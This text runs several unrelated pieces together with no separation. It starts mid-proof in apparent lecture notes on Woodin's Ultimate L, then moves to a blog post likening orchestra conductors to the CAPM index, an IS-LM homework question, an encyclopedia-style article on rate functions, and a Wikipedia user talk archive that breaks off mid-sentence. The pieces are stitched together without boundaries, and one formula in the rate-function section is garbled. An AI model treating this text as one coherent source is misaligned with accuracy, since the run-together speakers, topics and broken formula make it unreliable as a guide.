$\sigma(\bar\pi)=\pi$, so this reduces to $\sigma(\alpha)\in\pi(\sigma(a))$, i.e., to compute $\pi$, it suffices to know $\pi\upharpoonright{\rm ran}(\sigma)$. Recall that $\sigma\upharpoonright N\cap V_{\bar\lambda+1}\in N$, and consider $\sigma_0=\sigma\upharpoonright H(\bar\gamma^+)^N$. Note that $\sigma_0\in H(\gamma^+)^N$, and $\sigma_0:H(\bar\gamma^+)^N\to H(\gamma^+)^N$. Applying $\pi$ to $\sigma_0$, and using elementarity, we have $\pi(\sigma_0):\pi(H(\bar\gamma^+)^N)\to\pi(H(\gamma^+)^N)$. But $\pi(H(\bar\gamma^+)^N)=H(\bar\gamma^+)^N,$ because ${\rm cp}(\pi)\ge\delta$, while $\pi(H(\gamma^+)^N)=H(\pi(\gamma)^+)^N$. It follows that $\pi(\sigma(a))=\pi(\sigma_0)(\pi(a))=\pi(\sigma_0)(a)$. Since $\sigma_0\in {\rm dom}(\pi)$, we have $\pi(\sigma_0)\in N$ (simply note the range of $\pi$), and we are done, because we have reduced the question of whether $\alpha\in\bar \pi(a)$ to the question of whether $\sigma(\alpha)\in\pi(\sigma_0)(a)$, which $N$ can determine. $\Box$ Note how the Universality Theorem suggests that the construction of $L[\vec E]$ models for supercompactness using Magidor’s reformulation runs into difficulties; namely, if $\delta$ is supercompact, we have many extenders $F$ with critical point $\kappa_F<\delta$ and $\pi_F(\kappa_F)=\delta$, and we are now producing new extenders above $\delta$, that should somehow also be accounted for in $\vec E$. A nice application of universality is the dichotomy theorem for ${\sf HOD}$ mentioned at the end of last lecture. If ${\sf HOD}$ is a weak extender model for supercompactness, we obtain the following: Corollary. There is no sequence of (non-trivial) elementary embeddings ${\sf HOD}\to_{j_0}{\sf HOD}\to_{j_1}{\sf HOD}\to_{j_2}\dots$ with well-founded limit. $\Box$ It follows that there is a $\Sigma_2$-definable ordinal such that any embedding fixing this ordinal is the identity! This is because ${\sf HOD}=L[T]$ where $T$ is the $\Sigma_2$-theory in $V$ of the ordinals. In particular, there is no $j:({\sf HOD},T)\to({\sf HOD},T)$. Note that the corollary and this fact fail if ${\sf HOD}$ is replaced by an arbitrary weak extender model. The question of whether there can actually be embeddings $j:{\sf HOD}\to{\sf HOD}$ in a sense is still open, i.e., its consistency has currently only been established from the assumption in ${\sf ZF}$ that there are very strong versions of Reinhardt cardinals, i.e., strong versions of embeddings $j:V\to V$, the consistency of which is in itself problematic. (On the other hand, Hugh has shown that there are no embeddings $j:V\to{\sf HOD}$, and this can be established by an easy variant of Hugh’s proof of Kunen’s theorem as presented, for example, in Kanamori’s book (Second proof of Theorem 23.12).) Advertisements ### 4 Responses to Luminy – Hugh Woodin: Ultimate L (II) 1. […] Next lecture. 43.614000 -116.202000 […] 2. […] For the second lecture, see here. […] 3. […] For the second lecture, see here. […] 4. […] Next lecture. […]
## Conductors and CAPM For a long time I used to wonder why orchestras have conductors. I possibly first noticed the presence of the conductor sometime in the 1990s when Zubin Mehta was in the news. And then I always wondered why this person, who didn’t play anything but stood there waving a stick, needed to exist. Couldn’t the orchestra coordinate itself like rockstars or practitioners of Indian music forms do? And then i came across this video a year or two back. And then the computer science training I’d gone through two decades back kicked in – the job of an orchestra conductor is to reduce an O(n^2) problem to an O(n) problem. For a  group of musicians to make music, they need to coordinate with each other. Yes, they have the staff notation and all that, but still they need to know when to speed up or slow down, when to make what transitions, etc. They may have practiced together but the professional performance needs to be flawless. And so they need to constantly take cues from each other. When you have $n$ musicians who need to coordinate, you have $\frac{n.(n-1)}{2}$ pairs of people who need to coordinate. When $n$ is small, this is trivial, and so you see that small ensembles or rock bands can easily coordinate. However, as $n$ gets large, $n^2$ grows well-at-a-faster-rate. And that is a problem, and a risk. Enter the conductor. Rather than taking cues from one another, the musicians now simply need to take cues from this one person. And so there are now only $n$ pairs that need to coordinate – each musician in the band with the conductor. Or an $O(n^2)$ problem has become an $O(n)$ problem! For whatever reason, while I was thinking about this yesterday, I got reminded of legendary finance professor R Vaidya‘s class on capital asset pricing model (CAPM), or as he put it “Sharpe single index model” (surprisingly all the links I find for this are from Indian test prep sites, so not linking). We had just learnt portfolio theory, and how using the expected returns, variances and correlations between a set of securities we could construct an “efficient frontier” of securities that could give us the best risk-adjusted return. Seemed very mathematically elegant, except that in case you needed to construct a portfolio of $n$ stocks, you needed $n^2$ correlations. In other word, an $O(n^2)$ problem. And then Vaidya introduced CAPM, which magically reduced the problem to an $O(n)$ problem. By suddenly introducing the concept of an index, all that mattered for each stock now was its beta – the coefficient of its returns proportional to the index returns. You didn’t need to care about how stocks reacted with each other any more – all you needed was the relationship with the index. In a sense, if you think about it, the index in CAPM is like the conductor of an orchestra. If only all $O(n^2)$ problems could be reduced to $O(n)$ problems this elegantly!
# Question Assume the following equations summarize the structure of an economy. C=Ca+0.85(Y-T) Ca=260-10r T=200+0.2y (M/p)d=0.25y-25r Ms/p=2125 Ip=1500-30r G=1700 NX=500-0.08y A) Compute the value of the multiplier. B) Derive the equation for the autonomous planned spending schedule, Ap C) Derive the equation for the IS curve D) Calculate the slope of the IS curve, Change in R/ Change in Y ( hint use the equation of the IS curve to compute change Y/ Change in r . Then use the fact that the slope of the IS curve change r/ change in Y equals the inverse of change in Y/ change in r E) Derive the equation for the LM curve. F) Calculate the slope of the LM curve change in R/ Change Y ( to do this use the same hint as in part d) G) Compute the equilibrium interest rate (r) H) Compute the equilibrium real output (Y) Sales4 Views203
# Rate function In mathematics — specifically, in large deviations theory — a rate function is a function used to quantify the probabilities of rare events. It is required to have several properties which assist in the formulation of the large deviation principle.[clarification needed] In some sense, the large deviation principle is an analogue of weak convergence of probability measures, but one which takes account of how well the rare events behave. A rate function is also called[who?] a Cramér function, after the Swedish probabilist Harald Cramér. ## Definitions An extended real-valued function I : X → [0, +∞] defined on a Hausdorff topological space X is said to be a rate function if it is not identically +∞ and is lower semi-continuous, i.e. all the sub-level sets $\{ x \in X | I(x) \leq c \} \mbox{ for } c \geq 0$ are closed in X. If, furthermore, they are compact, then I is said to be a good rate function. A family of probability measures (μδ)δ>0 on X is said to satisfy the large deviation principle with rate function I : X → [0, +∞) (and rate 1 ⁄ δ) if, for every closed set F ⊆ X and every open set G ⊆ X, $\limsup_{\delta \downarrow 0} \delta \log \mu_{\delta} (F) \leq - \inf_{x \in F} I(x), \quad \mbox{(U)}$ $\liminf_{\delta \downarrow 0} \delta \log \mu_{\delta} (G) \geq - \inf_{x \in G} I(x). \quad \mbox{(L)}$ If the upper bound (U) holds only for compact (instead of closed) sets F, then (μδ)δ>0 is said to satisfy the weak large deviation principle (with rate 1 ⁄ δ and weak rate function I). ### Remarks The role of the open and closed sets in the large deviation principle is similar to their role in the weak convergence of probability measures: recall that (μδ)δ>0 is said to converge weakly to μ if, for every closed set F ⊆ X and every open set G ⊆ X, $\limsup_{\delta \downarrow 0} \mu_{\delta} (F) \leq \mu(F),$ $\liminf_{\delta \downarrow 0} \mu_{\delta} (G) \geq \mu(G).$ There is some variation in the nomenclature used in the literature: for example, den Hollander (2000) uses simply "rate function" where this article — following Dembo & Zeitouni (1998) — uses "good rate function", and "weak rate function". Fortunately, regardless of the nomenclature used for rate functions, examination of whether the upper bound inequality (U) is supposed to hold for closed or compact sets tells one whether the large deviation principle in use is strong or weak. ## Properties ### Uniqueness A natural question to ask, given the somewhat abstract setting of the general framework above, is whether the rate function is unique. This turns out to be the case: given a sequence of probability measures (μδ)δ>0 on X satisfying the large deviation principle for two rate functions I and J, it follows that I(x) = J(x) for all x ∈ X. ### Exponential tightness It is possible to convert a weak large deviation principle into a strong one if the measures converge sufficiently quickly. If the upper bound holds for compact sets F and the sequence of measures (μδ)δ>0 is exponentially tight, then the upper bound also holds for closed sets F. In other words, exponential tightness enables one to convert a weak large deviation principle into a strong one. ### Continuity Naïvely, one might try to replace the two inequalities (U) and (L) by the single requirement that, for all Borel sets S ⊆ X, $\lim_{\delta \downarrow 0} \delta \log \mu_{\delta} (S) = - \inf_{x \in S} I(x). \quad \mbox{(E)}$ Unfortunately, the equality (E) is far too restrictive, since many interesting examples satisfy (U) and (L) but not (E). For example, the measure μδ might be non-atomic for all δ, so the equality (E) could hold for S = {x} only if I were identically +∞, which is not permitted in the definition. However, the inequalities (U) and (L) do imply the equality (E) for so-called I-continuous sets S ⊆ X, those for which $I \big( \stackrel{\circ}{S} \big) = I \big( \bar{S} \big),$ where $\stackrel{\circ}{S}$ and $\bar{S}$ denote the interior and closure of S in X respectively. In many examples, many sets/events of interest are I-continuous. For example, if I is a continuous function, then all sets S such that $S \subseteq \bar{\stackrel{\circ}{S}}$ are I-continuous; all open sets, for example, satisfy this containment. ### Transformation of large deviation principles Given a large deviation principle on one space, it is often of interest to be able to construct a large deviation principle on another space. There are several results in this area: ## History and basic development The notion of a rate function began with the Swedish mathematician Harald Cramér's study of a sequence of i.i.d. random variables (Zi)i∈ℕ at the time of the Great Depression. Namely, among some considerations of scaling, Cramér studied the behavior of the distribution of $X_n=\frac 1 n \sum_{i=1}^n Z_i$ as n→∞.[1] He found that the tails of the distribution of Xn decay exponentially as e(x) where the factor λ(x) in the exponent is the Legendre transform (a.k.a. the convex conjugate) of the cumulant-generating function $\Psi_Z(t)=\log \mathbb E e^{tZ}.$ For this reason this particular function λ(x) is sometimes called the Cramér function. The rate function defined above in this article is a broad generalization of this notion of Cramér's, defined more abstractly on a probability space, rather than the state space of a random variable.
# User talk:Trovatore/Archive03 This archive page covers approximately the dates between 12 February 2006 and 4 December 2006. Post replies to the main talk page, copying or summarizing the section you are replying to if necessary. I will add new archivals to User talk:Trovatore/Archive04. (See Wikipedia:How to archive a talk page.) Thank you. Trovatore 07:27, 15 January 2007 (UTC) ## Re: Footnote/MathML bug Hi Trov, I've replied to you comment on my talk page. Paul August 23:18, 12 February 2006 (UTC) Saw it, thanks. If I see the bug again (and it's reasonably convenient) I'll grab the HTML source in case there's some developer who'd be willing to take a look at it. Do you know who I might send it to? --Trovatore 23:21, 12 February 2006 (UTC) Not really. Paul August 23:35, 12 February 2006 (UTC) I'd be interested in the HTML source. I think it might be related to bug 3504, but it's only a wild guess, and it wouldn't explain why you see the bug only intermittently. -- Jitse Niesen (talk) 01:31, 13 February 2006 (UTC) ## Wow! I should have asked for a pizza along with the explanation of omega-completeness. :) --moof 06:38, 14 February 2006 (UTC) ## Combined set theory Hi Trovatore. Have you taken a look at combined set theory? I've proposed it for deletion as original research, based on the authors comments at talk:combined set theory. If you think there is anything worth saving there, please remove the "PROD" tag. Thanks — Paul August 15:01, 22 February 2006 (UTC) Looks like a straightforward application of the NOR policy to me; I've noted before that in the math project we tend to be a little tolerant of minor OR (observations arrived at by routine methods, when they clarify issues in the article) but we can hardly allow an entire article on unpublished research. Once published it might well be an interesting subject for an article, though I haven't read deeply enough to really know if there's any there there. --Trovatore 16:11, 22 February 2006 (UTC) Yes that's what I figured, thanks for taking a look. Paul August 20:15, 22 February 2006 (UTC) ## twin prime conjecture Now on my watchlist. Dmharvey 03:18, 3 March 2006 (UTC) Thanks. --Trovatore 03:25, 3 March 2006 (UTC) Now on mine too. :) Oleg Alexandrov (talk) 03:37, 3 March 2006 (UTC) ## Good work Congratulations on the quick and excellent job of completing the article on Renato Caccioppoli initiated by me! --R.Sabbatini 10:37, 4 March 2006 (UTC) Thanks! --Trovatore 16:50, 4 March 2006 (UTC) ## Chinotto I think we both know what the pronunciation is but it's the phonetic transliteration that's the problem. When I read "keenAWtoh" I hear a strong New York accent! We need an accent-free version, otherwise I think it is misleading for non-Americans. Could you do an IPA version? (I'm not confident enough with IPA vowels.) Nick 18:57, 5 March 2006 (UTC) Most of the IPA symbols show up as boxes for me. I wish we'd move to Kirshenbaum, in which I'd write it "ki 'nOt to". --Trovatore 19:02, 5 March 2006 (UTC) ## mathematical induction this just doesn't strike me as an encyclopedia article. It would be a good sort of observation to include in a textbook, maybe for a discrete math course. --Trovatore 06:55, 6 March 2006 (UTC) Here's an exercise for you: 0 is not a sum of fewer than 0 numbers each of which is smaller than 0; 1 is not a sum of fewer than 1 numbers each of which is smaller than 1; 2 is not a sum of fewer than 2 numbers each of which is smaller than 2; 3 IS a sum of fewer than 3 numbers each of which is smaller than 3; generally, n IS a sum of fewer than n numbers each of which is smaller than n, for n ≥ 3. Comment on the relevance to this article. The numbers 0, 1, and 2 correspond to the three forms. Michael Hardy 21:54, 6 March 2006 (UTC) And this has what to do with whether this is a suitable topic for an encyclopedia article? Come on, Michael, we all know you've written many many good articles. This isn't one of them. The case division doesn't even have any precise meaning that I can see (for example, you can always re-index to make n=0 the "substantial" case, assuming we agree on what a "substantial" case is). It's a didactic observation worth communicating to students; that doesn't make it encyclopedic. --Trovatore No, you can't reindex that way, in the relevant sense. There is an obvious sense in which it is trivial to reindex that way, but that is not the relevant sense. To see why not, look carefully at the newly added example concerning the triangle inequality. If you're confusing the trivial sense in which you can reindex, with the actually relevant sense in which you cannot, then you haven't understood what this is about yet. But I think the recent edits, leaving the article no longer a stub, should make it clear. Michael Hardy 23:34, 6 March 2006 (UTC) Oh. One other remark: n = 0 n=0 The former is generally considered good style and is followed by TeX, but in non-TeX notation it requires conscious attention. (But ignore this remark until after you've digested my other comments.) Michael Hardy 23:35, 6 March 2006 (UTC) ...and now I've added Polya's famous proof that there is no horse of a different color. In some senses, that is the Platonic form of this idea. Michael Hardy 00:10, 7 March 2006 (UTC) ## Three forms of mathematical induction It was not intended to teach mathematical induction. It was not intended to explain what mathematical induction is, nor how to use it. What I see is (mostly) a bunch of non-mathematicians looking at the stub form in which the article appeared when it was nominated from deletion, and seeing that • It was not comprehensible to ordinary non-mathematicians who know what mathematical induction is, and • The article titled mathematical induction is comprehensible to ordinary non-mathematicians, even those who know --- say --- secondary-school algebra, but have never heard of mathematical induction. And so I have now expanded the article far beyond the stub stage, including • Substantial expansion and organization of the introductory section. • Two examples of part of the article that is probably hardest to understand to those who haven't seen these ideas. • An prefatory statement right at the top, saying that this article is NOT the appropriate place to try to learn what mathematical induction is or how to use it, with a link to the appropriate article for that. It explains that you need to know mathematical induction before you can read this article. Therefore, I invite those who voted to delete before I did these recent de-stubbing edits, to reconsider their votes in light of the current form of the article. (Nothing like nomination for deletion to get you to work on a long-neglected stub article!) Michael Hardy 23:30, 6 March 2006 (UTC) • Michael, I'm afraid I'm still not all that convinced. I see what you're getting at now, but some things come to mind: 1. You seem to be claiming, implicitly, that it's rare to have a proof by induction in which the base case and the induction step are both nontrivial, and where the first does not reduce to the second. That's probably true, if you're willing to work hard enough to do the reduction, but then it turns into a Scholastic argument about whether the idea of the base case is "the same" as the idea of the induction step. 2. I suspect that the reason you're having the nontrivial case show up when you have two prior steps is that you're using binary functions. If you were proving something analogous about ternary functions, wouldn't it show up only after you have three prior steps? The whole thing reminds me a little of the "threeness" idea of Charles Sanders Pierce. --Trovatore 02:38, 7 March 2006 (UTC) ## binary and ternary I suspect that the reason you're having the nontrivial case show up when you have two prior steps is that you're using binary functions. If you were proving something analogous about ternary functions, wouldn't it show up only after you have three prior steps? Can you do better than to merely suspect? How about an example of such a case involving ternary functions? The identity relation has an inherently binary character: if any two horses are of the same color, then all horses are of the same color. The addition and multiplication operations have an inherently binary character: if we can find the sum of any two numbers, then we can find the sum of any finite number of numbers. In both cases, breaking a set of n members into a union of fewer than n sets of size smaller than n is involved. That won't work if n = 2, so that is the basic case in induction arguments of this form.; we cannot reach the number 2 from below. Does anything have an inherently ternary character? Here's an attempt: A set A is linearly ordered by a relation "<" if and only if every subset B of A such that |B| = 3 is linearly ordered by that relation. Now are there any corresponding induction proofs? Michael Hardy 23:02, 14 March 2006 (UTC) Hmm, I'm not sure. Part of the problem is that the characterization above isn't quite right in general (doesn't work if A has cardinality 1 or 2) But it's this attempted divination of the "inherent character" of the base case that makes me uneasy with the whole argument. Whether natural-seeming definitions say something sensible in trivial cases is, I think, largely a matter of luck. In some cases, like your example with partitions, it does. In others, like whether 1 is a prime number, it doesn't (the most natural definitions make 1 a prime, but that just doesn't work right). That's why I'd like you to give a precise characterization of what you're talking about, and preferably find someone who's written about it. --Trovatore 23:18, 14 March 2006 (UTC) ## Trashing my introduction to "large countable ordinals" I do not appreciate your trashing of my introduction to "large countable ordinals". Granted that it was not polished yet and your added material is good. But you took out some important information. Also I think that there should be a section header before the introductory material to make it easier to edit it without having to edit the entire article. JRSpriggs 03:59, 16 March 2006 (UTC) I already repaired the introductions to large countable ordinals and ordinal arithmetic. Please do not delete anything from them again without discussing it first. JRSpriggs 04:26, 16 March 2006 (UTC) JRSpriggs, your wording is a bit too strong I think. I am sure you and Trov can reach a reasonable agreement without getting to "trash" things and arguing "whose" article that is. Oleg Alexandrov (talk) 16:00, 16 March 2006 (UTC) Now that I have had a day to cool off, I have tried to address Trovatore's concerns. Please let me know whether you like the new beginnings of the articles. I got angry because he seemed to come out of nowhere to make a lot of changes all at once while admitting that he had not even read the article carefully. Also he delete my links back to the main article "ordinal number" and other links without seeming to care about the effort I took to create them. JRSpriggs 08:05, 17 March 2006 (UTC) Thank you for the good things that you added to these articles. I now feel that I over-reacted to a minor inconsideration, and I should not have yelled at you. Please feel free to delete these comments and forget the whole thing. JRSpriggs 12:34, 19 March 2006 (UTC) Hi, Mike! I'm a Lloydie who decided to poke around your page a little bit after I saw your flag. Just so you'll know, I got a little bit crosswise with JRSpriggs when I first started working on Wikipedia, but now we talk to each other quite cordially almost all the time. Have a great day! ;^> DavidCBryant 11:19, 13 January 2007 (UTC) To David: I assume that you are talking about Mathematical induction#Infinite descent and Talk:Mathematical induction#Who is JRSpriggs? (which I found by going over your early contributions). Frankly, I had forgotten all about that. It seemed insignificant to me. I am sorry if it upset you. As for this section and my dispute with Trovatore, it occurred ten months ago when I had just started working on Wikipedia and just three files occupied my entire attention. So when he changed one of them unexpectedly, I over-reacted. I was trying to write something about ordinals and he modified it because of considerations related to cardinals which felt like an invasion from another part of mathematics. Also I did not understand how Wikipedia works generally then. Actually, I was hoping that Trovatore would eventually delete (or at least archive) this section of his talk page, because I now feel embarrassed by it. JRSpriggs 04:41, 15 January 2007 (UTC) ## another thing for you to vote on Could you please vote at Wikipedia:Articles_for_deletion/Proof_that_22_over_7_exceeds_π? Some people are actually saying any article devoted to a partiucalar mathematical proof is non-encyclopedic and should be deleted! Or that all articles primarily for mathematicians, that the general reader will not understand, should be deleted. Michael Hardy 00:13, 17 March 2006 (UTC) ## Criteria... Don't you hate that particular phenonema? (; Sorry, I couldn't resist.--Lacatosias 09:01, 17 March 2006 (UTC) ## Image copyright problem with Image:NetscapeNewsOops.jpg Thanks for uploading :Image:NetscapeNewsOops.jpg. The image has been identified as not specifying the copyright status of the image, which is required by Wikipedia's policy on images. If you don't indicate the copyright status of the image on the image's description page, using an appropriate copyright tag, it may be deleted some time in the next seven days. If you have uploaded other images, please verify that you have provided copyright information for them as well. This is an automated notice by OrphanBot. For assistance on the image use policy, see User talk:Carnildo/images. 00:18, 18 March 2006 (UTC) ## Bogdanov Affair Hi Trovatore, You asked an excellent question on the talk page of the "Bogdanov affair" article. I try to answer here because I cannot do it on the talk page of the article : the Arbcom banned me from Wikipedia, even for the talk page. The Arbcom banned all people involved in an "edition war" about the Bogdanov affair. For them, "entangled" just means that we had already argued about this affair on several fora (Usenet and Web) before we "arrived" on Wikipedia. The worst problem is that after this strong decision, they changed it : they "saved" 2 editors, who were 2 detractors of the Bogdanovs. One of them, rbj, had violently insulted them on the talk page of the article, without getting any reproach from the administrators who took part to the article... And then, he was "nominated" by the Arbcom to be able to write a NPOV article on these people he had insulted ! As I protested against this unfairness on the talk page, the Arbcom decided to extend the ban to the discussion pages... Of course the article is the less NPOV you can imagine : they even removed the external links to three sites about the Bogdanovs (including mine) without explanation, surely because they gave a good image of them. Since we are banned, we cannot neither put them back, nor protest against this new censorship on the talk page. I will write soon an article about this "affair Wikipedia" on my site (www.bogdanov.ch, one of the sites whose link they censored). Thank you and bravo, anyways, for having asked this question : I was surprised that nobody reacted to this argument of the Arbcom. Laurence67 ## Winning strategy Trovatore - I moved the article to that category because it seemed more similar to mathematical analysis of games like chess and nim, rather than game theory in economics. I understood that to basically be the distinction between our categories "game theory" and "combinatorial game theory". If you think it belongs in the other category, that's cool. I'm just trying to keep things organized... :) --best, kevin [kzollman][talk] 04:18, 28 March 2006 (UTC) I don't know whether it belongs in category:game theory either, but combinatorial game theory seems too specific for the article. --Trovatore 04:19, 28 March 2006 (UTC) I agree, there are several articles along these lines that don't really fit in with game theory as studied in economics, philosophy, and biology nor do they fit into combinatorial game theory. Perhaps a new category mathematical game theory? I don't like the name, since it implies other types of game theory is not mathematical. Got any ideas? --best, kevin [kzollman][talk] 04:29, 28 March 2006 (UTC) So there seem to be four classes of games that need to be taken into account, with some overlap between classes and possibly some common features I'm not capturing: 1. Games as in economics: Mostly not of perfect information, finite length, used instrumentally in studying other things. 2. Games that game players play (chess, etc): Some perfect information, some not. Finite length. Played as ends in themselves. 3. Games of the sort I'm interested in: Mostly infinite length, mostly perfect information, used instrumentally. 4. Combinatorial game theory: Perfect information, finite length, very specific winning condition (last player with a legal move wins), used both instrumentally and as ends in themselves. This term is very specific to the work of John Horton Conway and those who have followed up on it. Now I think winning strategy was aimed at all four sorts of games, which is why I wouldn't put it in category:combinatorial game theory; it's not specific to the Conway theory. Because of its generality I found it inadapt for the determinacy article, and put my own definition of winning strategy there. Anyway, just some thoughts; I don't have a good answer at the moment. Which of these four classes do see as part of "mathematical game theory"? --Trovatore 13:00, 28 March 2006 (UTC) I was thinking less about a division that was a nice cleavage of the topic, but rather a division based on which types of academics work on those. 1 is studied widely (econ, bio, philo, polisci, etc.) and known to most people as game theory. 2-4 are studied primarily by mathematicians whose interest is in them as mathematical objects, not as tools for empirical study. Could you say more about how winning strategy applies to 1? The thing that led me to move it was its reference to "winning" which is a term not oft used in type 1. --best, kevin [kzollman][talk] 18:09, 28 March 2006 (UTC) ## Do you have any suggested articles to work on? Oleg said that you might be able to suggest articles in the area of ordinal numbers or cardinal numbers which need work. Or topics for which new articles should be written. Do you have any suggestions? JRSpriggs 07:01, 30 March 2006 (UTC) A lot of the articles linked from list of large cardinal properties could use a lot of work; many of them are just bare definitions and could use background, context, and applications. There doesn't seem to be an admissible ordinal article, or one on the singular cardinal hypothesis. --Trovatore 16:14, 30 March 2006 (UTC) Another general suggestion: Look on Wikipedia:Requested articles/Mathematics#Logic for articles people have requested, and at Category:Mathematical logic stubs for articles needing serious expansion. --Trovatore 18:38, 30 March 2006 (UTC) Thanks for the information. JRSpriggs 04:15, 31 March 2006 (UTC) P.S. Your user-talk page is on my watch list. So you do not need to put a message on my user-talk page when you reply to one of my messages here. JRSpriggs 04:40, 31 March 2006 (UTC) I have added a lot of material to the article Constructible universe. Please proof-read it or give me comments on it. JRSpriggs 09:21, 15 April 2006 (UTC) ## Juan Rico No, he wasn't Argentine, his mom was killed in BA, but the family spoke Tagalog at home, so were almost certainly of Filippino descent. Given who wrote the book, characters speaking Anglic in public (not English, but close), and other character's names, I think we can assume that he and his family lived in North America, probably the former US. MilesVorkosigan 18:46, 10 April 2006 (UTC) Well, but who says it's about descent? I gather that there was a single world political structure so it may not make sense to talk about "citizenship" per se, but in that case if they lived in North America they were North Americans (just as a US citizen who moves to California is a Californian). --Trovatore 18:49, 10 April 2006 (UTC) ## Mexican mathematicians Hi Mike. I can give you some names of people who are or were both mathematicians at UNAM and notable in some way or another. I would probably be unable to provide more than stubs, though, and I would not be able to do so in the near future; I am about to leave town, and the semester is winding down. Off the top of my head, I can suggest Alberto Barajas and Graciela Salicrup (both now deceased); Emilio Lluis Riera (the first Ph.D. given in the new Campus in Ciudad Universitaria); and Jose Antonio de la Pe~a, one of the top people in representations of algebras (you can get a biographical sketch in English by going to http://www.matem.unam.mx/personal/index-investigadores.html, clicking on his name, and then on the "Curriculum" link that appears in the window). Magidin 19:48, 11 April 2006 (UTC) ## Golden ratio To start, I thought: If Schroeppel claimed this, it has to be true. Then I remembered having noticed something like ${\displaystyle \varphi ^{n}={\frac {L_{n}+F_{n}{\sqrt {5}}}{2}}.}$ This is basically immediate from the closed-form expressions for ${\displaystyle L_{n}}$ and ${\displaystyle F_{n}}$. So all you need now is some n such that ${\displaystyle L_{n}}$ and ${\displaystyle F_{n}}$ are both even. LambiamTalk 00:15, 12 April 2006 (UTC) ## Donald A. Martin Hey do, Mike. Concerning Tony Martin's article, it could do with a few things such as date of birth, background, and explaining Martin's Axiom in layman's terms. Otherwise, nice work! Fergananim 19:46, 19 April 2006 (UTC) So unfortunately I'm missing some of that information. I think he was born in '42, because his sixtieth birthday celebration was held in '02, but birthdays aren't always celebrated on the exact year, so that's not for sure. He hails from West Virginia but I don't have a source for that. Explaining MA in layman's terms? Have at it; better you than me. I suppose some aspects of it could be explained to non-set-theorist mathematicians, but better than that I can't see. One thing that would be interesting to mention, but that I'm not sure just how to source and work into the article, is that he doesn't have a PhD. He got an offer before he'd finished his dissertation, and just never bothered to jump through the hoops. My guess would be he's the only living US mathematician of similar fame to be in that position. --Trovatore 23:14, 19 April 2006 (UTC) ## Re. Falsifiability and Math Your point is indeed Imre Lakatos' position on the matter, and is obvious only to mathematicians and their friends, which was why I asked CSTAR first. I happen to think the point can be said far less obtusely than it currently is in that article. Very much appreciate your reply...Kenosis 13:42, 20 April 2006 (UTC) ## Forza Italia Hi! The reason for emptying is that I had added a new Category:Members of Forza Italia to several members of that party which were not included to Category:Forza Italia politicians. Furthermore, the new cat. is consistent with other about Italian parties (i.e.: Members of the Italian Communist Party, Members of the Italian Liberal Party etc.) —The preceding unsigned comment was added by Attilios (talkcontribs) 16:45, 22 April 2006 (UTC) You're still not supposed to empty a cat on your own initiative. You should list it on categories for deletion. Another possibility is to make Category:Forza Italia politicians a subcat of Category:Members of Forza Italia (then articles that appear in the former should not appear in the latter). A note on wikimarkup: When you want a link to a category, as opposed to adding a page to a category, put a colon before the word "category". [[:Category:Members of Forza Italia]] gives a link; [[Category:Members of Forza Italia]] makes my talk page part of the category. --Trovatore 16:50, 22 April 2006 (UTC) OK, thanks. The sole thing is: "You are supposed to" is not such a nice expression to use, at least with me here. Attilios 17:07, 22 April 2006 (UTC) Well, I thought maybe you weren't familiar with the accepted procedures. Looking through your contributions I see you've been very energetic contributing to articles, but I don't see much activity in Wikipedia space, which is where the procedural stuff gets done. I didn't make this up; this really is the accepted procedure. See Wikipedia:Categories for deletion for details. --Trovatore 17:10, 22 April 2006 (UTC) OK. Now we have in the same article Berlusconi listed as Member of Forza Italia and Forza Italia politician, simply because you're sticking on paper procedures instead of consistence of the encyclopedical content. I did a mistake, ok. But now? Why had a mistake to another? Let me know. Attilios Because maybe someone will object to the change. Not me; I don't really care. But someone could. You should undo the mistake by listing the category on Wikipedia:Categories for deletion. --Trovatore 18:40, 22 April 2006 (UTC) ## Merci for ze caring :D "boink" is a word I accidentally misused once...and to a woman, too. ;) --VKokielov 17:23, 26 April 2006 (UTC) ## Pornstar I did not "Know" that that photo was of a porn actress. My point, I think was not to imply that I have never "studied" such copyrighted photo's of women. When I was younger I was too familiar... my point was that there should be some way of protecting our kids from viewing sexually explicit stuff that adults may indulge in. Free speech on the internet is essential and I don't believe in censorship! I just am concerned about what kids can view on a safe free encyclopedia like Wikipedia. Let Bomis serve up Porn if they want to, but let Wiki be more family oriented. I'm sure its founder (Wales)would agree!--merlinus 14:25, 27 April 2006 (UTC) ## Saints Wikiproject I noted that you have been contributing to articles about saints. I invite you to join the WikiProject Saints. You can sign up on the page and add the following userbox to your user page. This user is a member of the Saints WikiProject. I also invite you to join the discussion on prayers and infoboxes here: Prayers_are_NPOV. Thanks! --evrik 16:57, 28 April 2006 (UTC) President Milosevic was called Sloba,not Slobo.......Only Croats and Muslims call him Slobo.....If you want to be part of it,please stay objective,and dont call him insulting names.Thank youDzoni 00:32, 29 April 2006 (UTC) ## Prodi You're right about Prodi. Sorry :-)--Stephen 17:12, 2 May 2006 (UTC) ## Hi, It's Merlinus It wasn't Vandalism to my own User Page. I was trying to make a link and I messed up and left a message saying so. Is my signer properly signing? --172.153.88.61 19:27, 2 May 2006 (UTC)? I think I restored my TALK page alright? Could you take a look? I have important things on there? I checked and I am properly signed on... I don't know why its not registering my name as Merlinus but just the numbers 172.153.88.61. Could it be because my wife uses her own Wikipedia User Page? I don't want to reregister under another different name or anything?--172.153.88.61 19:31, 2 May 2006 (UTC) Hm, I don't know why you're having the problem with your login. You might try the following: At the login page, check the box that says "remember me". Then, once logged in, clear your browser cache. As to your pages: You now seem to have identical content in User:Merlinus and User:Merlinus/Recently read books. I doubt that's what you want. If you no longer want the latter page to exist, put the following line {{db|author request}} at the top of the latter page, and someone will come along and delete it. --Trovatore 23:22, 2 May 2006 (UTC) Oh, one more thing, about your talk page: You seem to have done a copy-and-paste from User talk:Merlinus/Recently read books to User talk:Merlinus. The problem with that is that the GFDL requires attribution for other people's work; this attribution is usually contained in the page history. User talk:Merlinus does not contain that history, so it could be judged a copyright violation. What you should probably do is: 1. Copy anything you want to save from User talk:Merlinus to User talk:Merlinus/Recently read books, noting the authors in the edit summary. 2. Get an admin to delete User talk:Merlinus. 3. Move User talk:Merlinus/Recently read books to User talk:Merlinus. Then the history will be preserved. --Trovatore 23:29, 2 May 2006 (UTC) ## Khodorkovsky and martyrdom Hi Heptor, A while back I was looking at the article on Mikhail Khodorkovsky and saw a section called "An attempt at martyr creation", which was clearly tendentious. I changed it to the more neutral "Martyr?", with the question mark indicating that no position was being taken. I see you changed it back, claiming that the original was "more neutral". I think it's far less neutral; it's quite clearly anti-Khodorkovsky, whereas my version just asks a question. Maybe you can think of something better, but please don't change it back to the original POV version. --Trovatore 15:29, 2 May 2006 (UTC) Hi Trovatore, I'd say that "An attempt of martyr creation" is more neutral, but this is of course in the eye of the 